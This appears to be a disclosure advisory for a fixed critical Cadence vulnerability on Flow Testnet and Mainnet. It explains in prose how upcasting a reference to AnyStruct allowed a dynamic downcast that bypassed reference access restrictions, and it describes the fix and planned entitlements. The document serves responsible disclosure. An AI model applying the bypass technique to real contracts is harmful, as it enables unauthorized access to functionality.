- Current Status: Issue Fixed
- Affected Network: Testnet, Mainnet
Summary of Impact
A critical-impact vulnerability allowed circumventing reference semantics. This could have allowed someone to gain unauthorized access to more functionality than granted.
Technical Summary of Issue
Cadence has special type checking rules for references, e.g. unauthorized references may not be statically downcasted. However, upcasting the reference to
AnyStruct (references are value types) would have allowed a dynamic downcast to the reference that was originally created, because the dynamic downcasting only considers the concrete type of the value.
The security report was immediately acknowledged and reproduced. A fix was developed and deployed to all networks.
In the long-term, the Cadence team is working on FLIP for entitlements and safe reference downcasting, planned for inclusion in the upcoming Stable Cadence milestone, which proposes to improve the semantics of references by separating the concerns of subtyping and access control by introducing the concept of entitlements. Entitlements will eliminate this class of issue entirely.
As core contributors to the Flow ecosystem, we take reported issues
very seriously and would like to thank @bluesign for
reporting the following issue responsibly through our Responsible Disclosure Policy.